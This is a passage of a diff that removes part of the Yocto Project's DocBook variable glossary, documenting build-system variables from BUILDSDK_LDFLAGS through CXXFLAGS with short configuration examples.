-                BUILDSDK_LDFLAGS[doc] = "Specifies the flags to pass to the linker when building for the SDK."
-            </info>
-            <glossdef>
-                <para role="glossdeffirst">
-                    Specifies the flags to pass to the linker when building
-                    for the SDK.
-                    When building in the <filename>nativesdk-</filename>
-                    context,
-                    <link linkend='var-LDFLAGS'><filename>LDFLAGS</filename></link>
-                    is set to the value of this variable by default.
-                </para>
-            </glossdef>
-        </glossentry>
-
-        <glossentry id='var-BUILDSTATS_BASE'><glossterm>BUILDSTATS_BASE</glossterm>
-            <info>
-                BUILDSTATS_BASE[doc] = "Points to the location of the directory that holds build statistics when you use and enable the buildstats class."
-            </info>
-            <glossdef>
-                <para role="glossdeffirst">
-                    Points to the location of the directory that holds build
-                    statistics when you use and enable the
-                    <link linkend='ref-classes-buildstats'><filename>buildstats</filename></link>
-                    class.
-                    The <filename>BUILDSTATS_BASE</filename> directory defaults
-                    to
-                    <filename>${</filename><link linkend='var-TMPDIR'><filename>TMPDIR</filename></link><filename>}/buildstats/</filename>.
-                </para>
-            </glossdef>
-        </glossentry>
-
-        <glossentry id='var-BUSYBOX_SPLIT_SUID'><glossterm>BUSYBOX_SPLIT_SUID</glossterm>
-            <info>
-                BUSYBOX_SPLIT_SUID[doc] = "For the BusyBox recipe, specifies whether to split the output executable file into two parts: one for features that require setuid root, and one for the remaining features."
-            </info>
-            <glossdef>
-                <para role="glossdeffirst">
-                    For the BusyBox recipe, specifies whether to split the
-                    output executable file into two parts: one for features
-                    that require <filename>setuid root</filename>, and one for
-                    the remaining features (i.e. those that do not require
-                    <filename>setuid root</filename>).
-                </para>
-
-                <para>
-                    The <filename>BUSYBOX_SPLIT_SUID</filename> variable
-                    defaults to "1", which results in splitting the output
-                    executable file.
-                    Set the variable to "0" to get a single output executable
-                    file.
-                </para>
-            </glossdef>
-        </glossentry>
-
-    </glossdiv>
-
-    <glossdiv id='var-glossary-c'><title>C</title>
-
-        <glossentry id='var-CACHE'><glossterm>CACHE</glossterm>
-            <info>
-                CACHE[doc]  = "The directory BitBake uses to store a cache of the metadata."
-            </info>
-            <glossdef>
-                <para role="glossdeffirst">
-                    Specifies the directory BitBake uses to store a cache
-                    of the
-                    <link linkend='metadata'>Metadata</link>
-                    so it does not need to be parsed every time BitBake is
-                    started.
-                </para>
-            </glossdef>
-        </glossentry>
-
-        <glossentry id='var-CC'><glossterm>CC</glossterm>
-            <info>
-                CC[doc] = "Minimum command and arguments to run the C compiler."
-            </info>
-            <glossdef>
-                <para role="glossdeffirst">
-                    The minimal command and arguments used to run the C
-                    compiler.
-                </para>
-            </glossdef>
-        </glossentry>
-
-        <glossentry id='var-CFLAGS'><glossterm>CFLAGS</glossterm>
-            <info>
-                CFLAGS[doc] = "Flags passed to the C compiler for the target system. This variable evaluates to the same as TARGET_CFLAGS."
-            </info>
-            <glossdef>
-                <para role="glossdeffirst">
-                    Specifies the flags to pass to the C compiler.
-                    This variable is exported to an environment
-                    variable and thus made visible to the software being
-                    built during the compilation step.
-                </para>
-
-                <para>
-                    Default initialization for <filename>CFLAGS</filename>
-                    varies depending on what is being built:
-                    <itemizedlist>
-                        <listitem><para>
-                            <link linkend='var-TARGET_CFLAGS'><filename>TARGET_CFLAGS</filename></link>
-                            when building for the target
-                            </para></listitem>
-                        <listitem><para>
-                            <link linkend='var-BUILD_CFLAGS'><filename>BUILD_CFLAGS</filename></link>
-                            when building for the build host (i.e.
-                            <filename>-native</filename>)
-                            </para></listitem>
-                        <listitem><para>
-                            <link linkend='var-BUILDSDK_CFLAGS'><filename>BUILDSDK_CFLAGS</filename></link>
-                            when building for an SDK (i.e.
-                            <filename>nativesdk-</filename>)
-                            </para></listitem>
-                    </itemizedlist>
-                </para>
-            </glossdef>
-        </glossentry>
-
-        <glossentry id='var-CLASSOVERRIDE'><glossterm>CLASSOVERRIDE</glossterm>
-            <info>
-                CLASSOVERRIDE[doc] = "An internal variable specifying the special class override that should currently apply (e.g. "class-target", "class-native", and so forth)."
-            </info>
-            <glossdef>
-                <para role="glossdeffirst">
-                    An internal variable specifying the special class override
-                    that should currently apply (e.g. "class-target",
-                    "class-native", and so forth).
-                    The classes that use this variable (e.g.
-                    <link linkend='ref-classes-native'><filename>native</filename></link>,
-                    <link linkend='ref-classes-nativesdk'><filename>nativesdk</filename></link>,
-                    and so forth) set the variable to appropriate values.
-                    <note>
-                        <filename>CLASSOVERRIDE</filename> gets its default
-                        "class-target" value from the
-                        <filename>bitbake.conf</filename> file.
-                    </note>
-                </para>
-
-                <para>
-                    As an example, the following override allows you to install
-                    extra files, but only when building for the target:
-                    <literallayout class='monospaced'>
-     do_install_append_class-target() {
-         install my-extra-file ${D}${sysconfdir}
-     }
-                    </literallayout>
-                    Here is an example where <filename>FOO</filename>
-                    is set to "native" when building for the build host, and
-                    to "other" when not building for the build host:
-                    <literallayout class='monospaced'>
-     FOO_class-native = "native"
-     FOO = "other"
-                    </literallayout>
-                    The underlying mechanism behind
-                    <filename>CLASSOVERRIDE</filename> is simply that it is
-                    included in the default value of
-                    <link linkend='var-OVERRIDES'><filename>OVERRIDES</filename></link>.
-                </para>
-            </glossdef>
-        </glossentry>
-
-        <glossentry id='var-CLEANBROKEN'><glossterm>CLEANBROKEN</glossterm>
-            <info>
-                CLEANBROKEN[doc] = "Prevents the build system from running 'make clean' during the do_configure task."
-            </info>
-            <glossdef>
-                <para role="glossdeffirst">
-                    If set to "1" within a recipe,
-                    <filename>CLEANBROKEN</filename> specifies that
-                    the <filename>make clean</filename> command does
-                    not work for the software being built.
-                    Consequently, the OpenEmbedded build system will not try
-                    to run <filename>make clean</filename> during the
-                    <link linkend='ref-tasks-configure'><filename>do_configure</filename></link>
-                    task, which is the default behavior.
-                </para>
-            </glossdef>
-        </glossentry>
-
-        <glossentry id='var-COMBINED_FEATURES'><glossterm>COMBINED_FEATURES</glossterm>
-            <info>
-                COMBINED_FEATURES[doc] = "A set of features common between MACHINE_FEATURES and DISTRO_FEATURES."
-            </info>
-            <glossdef>
-                <para role="glossdeffirst">
-                    Provides a list of hardware features that are enabled in
-                    both
-                    <link linkend='var-MACHINE_FEATURES'><filename>MACHINE_FEATURES</filename></link>
-                    and
-                    <link linkend='var-DISTRO_FEATURES'><filename>DISTRO_FEATURES</filename></link>.
-                    This select list of features contains features that make
-                    sense to be controlled both at the machine and distribution
-                    configuration level.
-                    For example, the "bluetooth" feature requires hardware
-                    support but should also be optional at the distribution
-                    level, in case the hardware supports Bluetooth but you
-                    do not ever intend to use it.
-                </para>
-            </glossdef>
-        </glossentry>
-
-        <glossentry id='var-COMMON_LICENSE_DIR'><glossterm>COMMON_LICENSE_DIR</glossterm>
-            <info>
-                COMMON_LICENSE_DIR[doc] = "Points to meta/files/common-licenses in the Source Directory, which is where generic license files reside."
-            </info>
-            <glossdef>
-                <para role="glossdeffirst">
-                    Points to <filename>meta/files/common-licenses</filename>
-                    in the
-                    <link linkend='source-directory'>Source Directory</link>,
-                    which is where generic license files reside.
-                </para>
-            </glossdef>
-        </glossentry>
-
-        <glossentry id='var-COMPATIBLE_HOST'><glossterm>COMPATIBLE_HOST</glossterm>
-            <info>
-                COMPATIBLE_HOST[doc] = "A regular expression that resolves to one or more hosts (when the recipe is native) or one or more targets (when the recipe is non-native) with which a recipe is compatible."
-            </info>
-            <glossdef>
-                <para role="glossdeffirst">
-                    A regular expression that resolves to one or more hosts
-                    (when the recipe is native) or one or more targets (when
-                    the recipe is non-native) with which a recipe is compatible.
-                    The regular expression is matched against
-                    <link linkend="var-HOST_SYS"><filename>HOST_SYS</filename></link>.
-                    You can use the variable to stop recipes from being built
-                    for classes of systems with which the recipes are not
-                    compatible.
-                    Stopping these builds is particularly useful with kernels.
-                    The variable also helps to increase parsing speed
-                    since the build system skips parsing recipes not
-                    compatible with the current system.
-               </para>
-            </glossdef>
-        </glossentry>
-
-        <glossentry id='var-COMPATIBLE_MACHINE'><glossterm>COMPATIBLE_MACHINE</glossterm>
-            <info>
-                COMPATIBLE_MACHINE[doc] = "A regular expression that resolves to one or more target machines with which a recipe is compatible."
-            </info>
-            <glossdef>
-                <para role="glossdeffirst">
-                    A regular expression that resolves to one or more
-                    target machines with which a recipe is compatible.
-                    The regular expression is matched against
-                    <link linkend="var-MACHINEOVERRIDES"><filename>MACHINEOVERRIDES</filename></link>.
-                    You can use the variable to stop recipes from being built
-                    for machines with which the recipes are not compatible.
-                    Stopping these builds is particularly useful with kernels.
-                    The variable also helps to increase parsing speed
-                    since the build system skips parsing recipes not
-                    compatible with the current machine.
-                </para>
-            </glossdef>
-        </glossentry>
-
-        <glossentry id='var-COMPLEMENTARY_GLOB'><glossterm>COMPLEMENTARY_GLOB</glossterm>
-            <info>
-                COMPLEMENTARY_GLOB[doc] = "Defines wildcards to match when installing a list of complementary packages for all the packages installed in an image."
-            </info>
-            <glossdef>
-                <para role="glossdeffirst">
-                    Defines wildcards to match when installing a list of
-                    complementary packages for all the packages explicitly
-                    (or implicitly) installed in an image.
-                    <note>
-                        The <filename>COMPLEMENTARY_GLOB</filename> variable
-                        uses Unix filename pattern matching
-                        (<ulink url='https://docs.python.org/2/library/fnmatch.html#module-fnmatch'><filename>fnmatch</filename></ulink>),
-                        which is similar to the Unix style pathname pattern
-                        expansion
-                        (<ulink url='https://docs.python.org/2/library/glob.html'><filename>glob</filename></ulink>).
-                    </note>
-                    The resulting list of complementary packages is associated
-                    with an item that can be added to
-                    <link linkend='var-IMAGE_FEATURES'><filename>IMAGE_FEATURES</filename></link>.
-                    An example usage of this is the "dev-pkgs" item that when
-                    added to <filename>IMAGE_FEATURES</filename> will
-                    install -dev packages (containing headers and other
-                    development files) for every package in the image.
-                </para>
-
-                <para>
-                    To add a new feature item pointing to a wildcard, use a
-                    variable flag to specify the feature item name and
-                    use the value to specify the wildcard.
-                    Here is an example:
-                    <literallayout class='monospaced'>
-     COMPLEMENTARY_GLOB[dev-pkgs] = '*-dev'
-                    </literallayout>
-                </para>
-            </glossdef>
-        </glossentry>
-
-        <glossentry id='var-COMPONENTS_DIR'><glossterm>COMPONENTS_DIR</glossterm>
-            <info>
-                COMPONENTS_DIR[doc] = "Stores sysroot components for each recipe."
-            </info>
-            <glossdef>
-                <para role="glossdeffirst">
-                    Stores sysroot components for each recipe.
-                    The OpenEmbedded build system uses
-                    <filename>COMPONENTS_DIR</filename> when constructing
-                    recipe-specific sysroots for other recipes.
-                </para>
-
-                <para>
-                    The default is
-                    "<filename>${</filename><link linkend='var-STAGING_DIR'><filename>STAGING_DIR</filename></link><filename>}-components</filename>."
-                    (i.e. "<filename>${</filename><link linkend='var-TMPDIR'><filename>TMPDIR</filename></link><filename>}/sysroots-components</filename>").
-                </para>
-            </glossdef>
-        </glossentry>
-
-        <glossentry id='var-CONF_VERSION'><glossterm>CONF_VERSION</glossterm>
-            <info>
-                CONF_VERSION[doc] = "Tracks the version of local.conf.  Increased each time build/conf/ changes incompatibly."
-            </info>
-            <glossdef>
-                <para role="glossdeffirst">
-                    Tracks the version of the local configuration file
-                    (i.e. <filename>local.conf</filename>).
-                    The value for <filename>CONF_VERSION</filename>
-                    increments each time <filename>build/conf/</filename>
-                    compatibility changes.
-                </para>
-            </glossdef>
-        </glossentry>
-
-        <glossentry id='var-CONFFILES'><glossterm>CONFFILES</glossterm>
-            <info>
-                CONFFILES[doc] = "Identifies editable or configurable files that are part of a package."
-            </info>
-            <glossdef>
-                <para role="glossdeffirst">
-                    Identifies editable or configurable files that are part of a package.
-                    If the Package Management System (PMS) is being used to update
-                    packages on the target system, it is possible that
-                    configuration files you have changed after the original installation
-                    and that you now want to remain unchanged are overwritten.
-                    In other words, editable files might exist in the package that you do not
-                    want reset as part of the package update process.
-                    You can use the <filename>CONFFILES</filename> variable to list the files in the
-                    package that you wish to prevent the PMS from overwriting during this update process.
-                </para>
-
-                <para>
-                    To use the <filename>CONFFILES</filename> variable, provide a package name
-                    override that identifies the resulting package.
-                    Then, provide a space-separated list of files.
-                    Here is an example:
-                    <literallayout class='monospaced'>
-     CONFFILES_${PN} += "${sysconfdir}/file1 \
-        ${sysconfdir}/file2 ${sysconfdir}/file3"
-                    </literallayout>
-                </para>
-
-                <para>
-                    A relationship exists between the <filename>CONFFILES</filename> and
-                    <filename><link linkend='var-FILES'>FILES</link></filename> variables.
-                    The files listed within <filename>CONFFILES</filename> must be a subset of
-                    the files listed within <filename>FILES</filename>.
-                    Because the configuration files you provide with <filename>CONFFILES</filename>
-                    are simply being identified so that the PMS will not overwrite them,
-                    it makes sense that
-                    the files must already be included as part of the package through the
-                    <filename>FILES</filename> variable.
-                </para>
-
-                <note>
-                    When specifying paths as part of the <filename>CONFFILES</filename> variable,
-                    it is good practice to use appropriate path variables.
-                    For example, <filename>${sysconfdir}</filename> rather than
-                    <filename>/etc</filename> or <filename>${bindir}</filename> rather
-                    than <filename>/usr/bin</filename>.
-                    You can find a list of these variables at the top of the
-                    <filename>meta/conf/bitbake.conf</filename> file in the
-                    <link linkend='source-directory'>Source Directory</link>.
-                </note>
-            </glossdef>
-        </glossentry>
-
-        <glossentry id='var-CONFIG_INITRAMFS_SOURCE'><glossterm>CONFIG_INITRAMFS_SOURCE</glossterm>
-            <info>
-                CONFIG_INITRAMFS_SOURCE[doc] = "Identifies the initial RAM filesystem (initramfs) source files. The OpenEmbedded build system receives and uses this kernel Kconfig variable as an environment variable."
-            </info>
-            <glossdef>
-                <para role="glossdeffirst">
-                    Identifies the initial RAM filesystem (initramfs) source
-                    files.
-                    The OpenEmbedded build system receives and uses
-                    this kernel Kconfig variable as an environment variable.
-                    By default, the variable is set to null ("").
-                </para>
-
-                <para>
-                    The <filename>CONFIG_INITRAMFS_SOURCE</filename> can be
-                    either a single cpio archive with a
-                    <filename>.cpio</filename> suffix or a
-                    space-separated list of directories and files for building
-                    the initramfs image.
-                    A cpio archive should contain a filesystem archive
-                    to be used as an initramfs image.
-                    Directories should contain a filesystem layout to be
-                    included in the initramfs image.
-                    Files should contain entries according to the format
-                    described by the
-                    <filename>usr/gen_init_cpio</filename> program in the
-                    kernel tree.
-                </para>
-
-                <para>
-                    If you specify multiple directories and files, the
-                    initramfs image will be the aggregate of all of them.
-                </para>
-
-                <para>
-                    For information on creating an initramfs, see the
-                    "<ulink url='&YOCTO_DOCS_DEV_URL;#building-an-initramfs-image'>Building an Initial RAM Filesystem (initramfs) Image</ulink>"
-                    section in the Yocto Project Development Tasks Manual.
-                </para>
-            </glossdef>
-        </glossentry>
-
-        <glossentry id='var-CONFIG_SITE'><glossterm>CONFIG_SITE</glossterm>
-            <info>
-                CONFIG_SITE[doc] = "A list of files that contains autoconf test results relevant to the current build. This variable is used by the Autotools utilities when running configure."
-            </info>
-            <glossdef>
-                <para role="glossdeffirst">
-                    A list of files that contains <filename>autoconf</filename> test results relevant
-                    to the current build.
-                    This variable is used by the Autotools utilities when running
-                    <filename>configure</filename>.
-                </para>
-            </glossdef>
-        </glossentry>
-
-        <glossentry id='var-CONFIGURE_FLAGS'><glossterm>CONFIGURE_FLAGS</glossterm>
-            <info>
-                CONFIGURE_FLAGS[doc] = "The minimal arguments for GNU configure."
-            </info>
-            <glossdef>
-                <para role="glossdeffirst">
-                    The minimal arguments for GNU configure.
-                </para>
-            </glossdef>
-        </glossentry>
-
-        <glossentry id='var-CONFLICT_DISTRO_FEATURES'><glossterm>CONFLICT_DISTRO_FEATURES</glossterm>
-            <info>
-                CONFLICT_DISTRO_FEATURES[doc] = "When a recipe inherits the distro_features_check class, this variable identifies distribution features that would be in conflict should the recipe be built."
-            </info>
-            <glossdef>
-                <para role="glossdeffirst">
-                    When inheriting the
-                    <link linkend='ref-classes-distro_features_check'><filename>distro_features_check</filename></link>
-                    class, this
-                    variable identifies distribution features that would
-                    be in conflict should the recipe
-                    be built.
-                    In other words, if the
-                    <filename>CONFLICT_DISTRO_FEATURES</filename> variable
-                    lists a feature that also appears in
-                    <filename>DISTRO_FEATURES</filename> within the
-                    current configuration, an error occurs and the
-                    build stops.
-                </para>
-            </glossdef>
-        </glossentry>
-
-        <glossentry id='var-COPYLEFT_LICENSE_EXCLUDE'><glossterm>COPYLEFT_LICENSE_EXCLUDE</glossterm>
-            <info>
-                COPYLEFT_LICENSE_EXCLUDE[doc] = "Licenses to exclude in the source archived by the archiver class."
-            </info>
-            <glossdef>
-                <para role="glossdeffirst">
-                    A space-separated list of licenses to exclude from the
-                    source archived by the
-                    <link linkend='ref-classes-archiver'><filename>archiver</filename></link>
-                    class.
-                    In other words, if a license in a recipe's
-                    <link linkend='var-LICENSE'><filename>LICENSE</filename></link>
-                    value is in the value of
-                    <filename>COPYLEFT_LICENSE_EXCLUDE</filename>, then its
-                    source is not archived by the class.
-                    <note>
-                        The <filename>COPYLEFT_LICENSE_EXCLUDE</filename>
-                        variable takes precedence over the
-                        <link linkend='var-COPYLEFT_LICENSE_INCLUDE'><filename>COPYLEFT_LICENSE_INCLUDE</filename></link>
-                        variable.
-                    </note>
-                    The default value, which is "CLOSED Proprietary", for
-                    <filename>COPYLEFT_LICENSE_EXCLUDE</filename> is set
-                    by the
-                    <link linkend='ref-classes-copyleft_filter'><filename>copyleft_filter</filename></link>
-                    class, which is inherited by the
-                    <filename>archiver</filename> class.
-                </para>
-            </glossdef>
-        </glossentry>
-
-        <glossentry id='var-COPYLEFT_LICENSE_INCLUDE'><glossterm>COPYLEFT_LICENSE_INCLUDE</glossterm>
-            <info>
-                COPYLEFT_LICENSE_INCLUDE[doc] = "Licenses to include in the source archived by the archiver class."
-            </info>
-            <glossdef>
-                <para role="glossdeffirst">
-                    A space-separated list of licenses to include in the
-                    source archived by the
-                    <link linkend='ref-classes-archiver'><filename>archiver</filename></link>
-                    class.
-                    In other words, if a license in a recipe's
-                    <link linkend='var-LICENSE'><filename>LICENSE</filename></link>
-                    value is in the value of
-                    <filename>COPYLEFT_LICENSE_INCLUDE</filename>, then its
-                    source is archived by the class.
-                </para>
-
-                <para>
-                    The default value is set by the
-                    <link linkend='ref-classes-copyleft_filter'><filename>copyleft_filter</filename></link>
-                    class, which is inherited by the
-                    <filename>archiver</filename> class.
-                    The default value includes "GPL*", "LGPL*", and "AGPL*".
-                </para>
-            </glossdef>
-        </glossentry>
-
-        <glossentry id='var-COPYLEFT_PN_EXCLUDE'><glossterm>COPYLEFT_PN_EXCLUDE</glossterm>
-            <info>
-                COPYLEFT_PN_EXCLUDE[doc] = "Recipes to exclude in the source archived by the archiver class."
-            </info>
-            <glossdef>
-                <para role="glossdeffirst">
-                    A list of recipes to exclude in the source archived
-                    by the
-                    <link linkend='ref-classes-archiver'><filename>archiver</filename></link>
-                    class.
-                    The <filename>COPYLEFT_PN_EXCLUDE</filename> variable
-                    overrides the license inclusion and exclusion caused
-                    through the
-                    <link linkend='var-COPYLEFT_LICENSE_INCLUDE'><filename>COPYLEFT_LICENSE_INCLUDE</filename></link>
-                    and
-                    <link linkend='var-COPYLEFT_LICENSE_EXCLUDE'><filename>COPYLEFT_LICENSE_EXCLUDE</filename></link>
-                    variables, respectively.
-                </para>
-
-                <para>
-                    The default value, which is "" indicating to not explicitly
-                    exclude any recipes by name, for
-                    <filename>COPYLEFT_PN_EXCLUDE</filename> is set
-                    by the
-                    <link linkend='ref-classes-copyleft_filter'><filename>copyleft_filter</filename></link>
-                    class, which is inherited by the
-                    <filename>archiver</filename> class.
-                </para>
-            </glossdef>
-        </glossentry>
-
-        <glossentry id='var-COPYLEFT_PN_INCLUDE'><glossterm>COPYLEFT_PN_INCLUDE</glossterm>
-            <info>
-                COPYLEFT_PN_INCLUDE[doc] = "Recipes to include in the source archived by the archiver class."
-            </info>
-            <glossdef>
-                <para role="glossdeffirst">
-                    A list of recipes to include in the source archived
-                    by the
-                    <link linkend='ref-classes-archiver'><filename>archiver</filename></link>
-                    class.
-                    The <filename>COPYLEFT_PN_INCLUDE</filename> variable
-                    overrides the license inclusion and exclusion caused
-                    through the
-                    <link linkend='var-COPYLEFT_LICENSE_INCLUDE'><filename>COPYLEFT_LICENSE_INCLUDE</filename></link>
-                    and
-                    <link linkend='var-COPYLEFT_LICENSE_EXCLUDE'><filename>COPYLEFT_LICENSE_EXCLUDE</filename></link>
-                    variables, respectively.
-                </para>
-
-                <para>
-                    The default value, which is "" indicating to not explicitly
-                    include any recipes by name, for
-                    <filename>COPYLEFT_PN_INCLUDE</filename> is set
-                    by the
-                    <link linkend='ref-classes-copyleft_filter'><filename>copyleft_filter</filename></link>
-                    class, which is inherited by the
-                    <filename>archiver</filename> class.
-                </para>
-            </glossdef>
-        </glossentry>
-
-        <glossentry id='var-COPYLEFT_RECIPE_TYPES'><glossterm>COPYLEFT_RECIPE_TYPES</glossterm>
-            <info>
-                COPYLEFT_RECIPE_TYPES[doc] = "Recipe types to include in the source archived by the archiver class."
-            </info>
-            <glossdef>
-                <para role="glossdeffirst">
-                    A space-separated list of recipe types to include
-                    in the source archived by the
-                    <link linkend='ref-classes-archiver'><filename>archiver</filename></link>
-                    class.
-                    Recipe types are <filename>target</filename>,
-                    <filename>native</filename>,
-                    <filename>nativesdk</filename>,
-                    <filename>cross</filename>,
-                    <filename>crosssdk</filename>, and
-                    <filename>cross-canadian</filename>.
-                </para>
-
-                <para>
-                    The default value, which is "target*", for
-                    <filename>COPYLEFT_RECIPE_TYPES</filename> is set
-                    by the
-                    <link linkend='ref-classes-copyleft_filter'><filename>copyleft_filter</filename></link>
-                    class, which is inherited by the
-                    <filename>archiver</filename> class.
-                </para>
-            </glossdef>
-        </glossentry>
-
-        <glossentry id='var-COPY_LIC_DIRS'><glossterm>COPY_LIC_DIRS</glossterm>
-            <info>
-                COPY_LIC_DIRS[doc] = "If set to "1" along with the COPY_LIC_MANIFEST variable, the OpenEmbedded build system copies into the image the license files, which are located in /usr/share/common-licenses, for each package."
-            </info>
-            <glossdef>
-                <para role="glossdeffirst">
-                    If set to "1" along with the
-                    <link linkend='var-COPY_LIC_MANIFEST'><filename>COPY_LIC_MANIFEST</filename></link>
-                    variable, the OpenEmbedded build system copies
-                    into the image the license files, which are located in
-                    <filename>/usr/share/common-licenses</filename>,
-                    for each package.
-                    The license files are placed
-                    in directories within the image itself during build time.
-                    <note>
-                        The <filename>COPY_LIC_DIRS</filename> does not
-                        offer a path for adding licenses for newly installed
-                        packages to an image, which might be most suitable
-                        for read-only filesystems that cannot be upgraded.
-                        See the
-                        <link linkend='var-LICENSE_CREATE_PACKAGE'><filename>LICENSE_CREATE_PACKAGE</filename></link>
-                        variable for additional information.
-                        You can also reference the
-                        "<ulink url='&YOCTO_DOCS_DEV_URL;#providing-license-text'>Providing License Text</ulink>"
-                        section in the Yocto Project Development Tasks Manual
-                        for information on providing license text.
-                    </note>
-                </para>
-            </glossdef>
-        </glossentry>
-
-        <glossentry id='var-COPY_LIC_MANIFEST'><glossterm>COPY_LIC_MANIFEST</glossterm>
-            <info>
-                COPY_LIC_MANIFEST[doc] = "If set to "1", the OpenEmbedded build system copies the license manifest for the image to /usr/share/common-licenses/license.manifest within the image itself."
-            </info>
-            <glossdef>
-                <para role="glossdeffirst">
-                    If set to "1", the OpenEmbedded build system copies
-                    the license manifest for the image to
-                    <filename>/usr/share/common-licenses/license.manifest</filename>
-                    within the image itself during build time.
-                    <note>
-                        The <filename>COPY_LIC_MANIFEST</filename> does not
-                        offer a path for adding licenses for newly installed
-                        packages to an image, which might be most suitable
-                        for read-only filesystems that cannot be upgraded.
-                        See the
-                        <link linkend='var-LICENSE_CREATE_PACKAGE'><filename>LICENSE_CREATE_PACKAGE</filename></link>
-                        variable for additional information.
-                        You can also reference the
-                        "<ulink url='&YOCTO_DOCS_DEV_URL;#providing-license-text'>Providing License Text</ulink>"
-                        section in the Yocto Project Development Tasks Manual
-                        for information on providing license text.
-                    </note>
-                </para>
-            </glossdef>
-        </glossentry>
-
-        <glossentry id='var-CORE_IMAGE_EXTRA_INSTALL'><glossterm>CORE_IMAGE_EXTRA_INSTALL</glossterm>
-            <info>
-                CORE_IMAGE_EXTRA_INSTALL[doc] = "Specifies the list of packages to be added to the image. You should only set this variable in the conf/local.conf file in the Build Directory."
-            </info>
-            <glossdef>
-                <para role="glossdeffirst">
-                    Specifies the list of packages to be added to the image.
-                    You should only set this variable in the
-                    <filename>local.conf</filename> configuration file found
-                    in the
-                    <link linkend='build-directory'>Build Directory</link>.
-                </para>
-
-                <para>
-                    This variable replaces <filename>POKY_EXTRA_INSTALL</filename>, which is no longer supported.
-                </para>
-            </glossdef>
-        </glossentry>
-
-        <glossentry id='var-COREBASE'><glossterm>COREBASE</glossterm>
-            <info>
-                COREBASE[doc] = "Specifies the parent directory of the OpenEmbedded-Core Metadata layer (i.e. meta)."
-            </info>
-            <glossdef>
-                <para role="glossdeffirst">
-                    Specifies the parent directory of the OpenEmbedded-Core
-                    Metadata layer (i.e. <filename>meta</filename>).
-                </para>
-
-                <para>
-                    It is an important distinction that
-                    <filename>COREBASE</filename> points to the parent of this
-                    layer and not the layer itself.
-                    Consider an example where you have cloned the Poky Git
-                    repository and retained the <filename>poky</filename>
-                    name for your local copy of the repository.
-                    In this case, <filename>COREBASE</filename> points to
-                    the <filename>poky</filename> folder because it is the
-                    parent directory of the <filename>poky/meta</filename>
-                    layer.
-                </para>
-            </glossdef>
-        </glossentry>
-
-        <glossentry id='var-COREBASE_FILES'><glossterm>COREBASE_FILES</glossterm>
-            <info>
-                COREBASE_FILES[doc] = "Lists files from the COREBASE directory that should be copied other than the layers listed in the bblayers.conf file."
-            </info>
-            <glossdef>
-                <para role="glossdeffirst">
-                    Lists files from the
-                    <link linkend='var-COREBASE'><filename>COREBASE</filename></link>
-                    directory that should be copied other than the layers
-                    listed in the <filename>bblayers.conf</filename> file.
-                    The <filename>COREBASE_FILES</filename> variable exists
-                    for the purpose of copying metadata from the
-                    OpenEmbedded build system into the extensible
-                    SDK.
-                </para>
-
-                <para>
-                    Explicitly listing files in <filename>COREBASE</filename>
-                    is needed because it typically contains build
-                    directories and other files that should not normally
-                    be copied into the extensible SDK.
-                    Consequently, the value of
-                    <filename>COREBASE_FILES</filename> is used in order to
-                    only copy the files that are actually needed.
-                </para>
-            </glossdef>
-        </glossentry>
-
-        <glossentry id='var-CPP'><glossterm>CPP</glossterm>
-            <info>
-                CPP[doc] = "Minimum command and arguments to run the C preprocessor."
-            </info>
-            <glossdef>
-                <para role="glossdeffirst">
-                    The minimal command and arguments used to run the C
-                    preprocessor.
-                </para>
-            </glossdef>
-        </glossentry>
-
-        <glossentry id='var-CPPFLAGS'><glossterm>CPPFLAGS</glossterm>
-            <info>
-                CPPFLAGS[doc] = "Specifies the flags to pass to the C pre-processor (i.e. to both the C and the C++ compilers)."
-            </info>
-            <glossdef>
-                <para role="glossdeffirst">
-                    Specifies the flags to pass to the C pre-processor
-                    (i.e. to both the C and the C++ compilers).
-                    This variable is exported to an environment
-                    variable and thus made visible to the software being
-                    built during the compilation step.
-                </para>
-
-                <para>
-                    Default initialization for <filename>CPPFLAGS</filename>
-                    varies depending on what is being built:
-                    <itemizedlist>
-                        <listitem><para>
-                            <link linkend='var-TARGET_CPPFLAGS'><filename>TARGET_CPPFLAGS</filename></link>
-                            when building for the target
-                            </para></listitem>
-                        <listitem><para>
-                            <link linkend='var-BUILD_CPPFLAGS'><filename>BUILD_CPPFLAGS</filename></link>
-                            when building for the build host (i.e.
-                            <filename>-native</filename>)
-                            </para></listitem>
-                        <listitem><para>
-                            <link linkend='var-BUILDSDK_CPPFLAGS'><filename>BUILDSDK_CPPFLAGS</filename></link>
-                            when building for an SDK (i.e.
-                            <filename>nativesdk-</filename>)
-                            </para></listitem>
-                    </itemizedlist>
-                </para>
-            </glossdef>
-        </glossentry>
-
-        <glossentry id='var-CROSS_COMPILE'><glossterm>CROSS_COMPILE</glossterm>
-            <info>
-                CROSS_COMPILE[doc] = "The toolchain binary prefix for the target tools."
-            </info>
-            <glossdef>
-               <para role="glossdeffirst">
-                    The toolchain binary prefix for the target tools.
-                    The <filename>CROSS_COMPILE</filename> variable is the
-                    same as the
-                    <link linkend='var-TARGET_PREFIX'><filename>TARGET_PREFIX</filename></link>
-                    variable.
-                    <note>
-                        The OpenEmbedded build system sets the
-                        <filename>CROSS_COMPILE</filename> variable only in
-                        certain contexts (e.g. when building for kernel
-                        and kernel module recipes).
-                    </note>
-                </para>
-            </glossdef>
-        </glossentry>
-
-        <glossentry id='var-CVSDIR'><glossterm>CVSDIR</glossterm>
-            <info>
-                CVSDIR[doc] = "The directory where cvs checkouts will be stored in."
-            </info>
-            <glossdef>
-                <para role="glossdeffirst">
-                    The directory in which files checked out under the
-                    CVS system are stored.
-                </para>
-            </glossdef>
-        </glossentry>
-
-        <glossentry id='var-CXX'><glossterm>CXX</glossterm>
-            <info>
-                CXX[doc] = "Minimum command and arguments to run the C++ compiler."
-            </info>
-            <glossdef>
-                <para role="glossdeffirst">
-                    The minimal command and arguments used to run the C++
-                    compiler.
-                </para>
-            </glossdef>
-        </glossentry>
-
-        <glossentry id='var-CXXFLAGS'><glossterm>CXXFLAGS</glossterm>
-            <info>
-                CXXFLAGS[doc] = "Specifies the flags to pass to the C++ compiler."
-            </info>
-            <glossdef>
-                <para role="glossdeffirst">
-                    Specifies the flags to pass to the C++ compiler.
-                    This variable is exported to an environment
-                    variable and thus made visible to the software being
-                    built during the compilation step.
-                </para>
-
-                <para>
-                    Default initialization for <filename>CXXFLAGS</filename>
-                    varies depending on what is being built:
-                    <itemizedlist>
-                        <listitem><para>
-                            <link linkend='var-TARGET_CXXFLAGS'><filename>TARGET_CXXFLAGS</filename></link>
-                            when building for the target
-                            </para></listitem>
-                        <listitem><para>
-                            <link linkend='var-BUILD_CXXFLAGS'><filename>BUILD_CXXFLAGS</filename></link>
-                            when building for the build host (i.e.
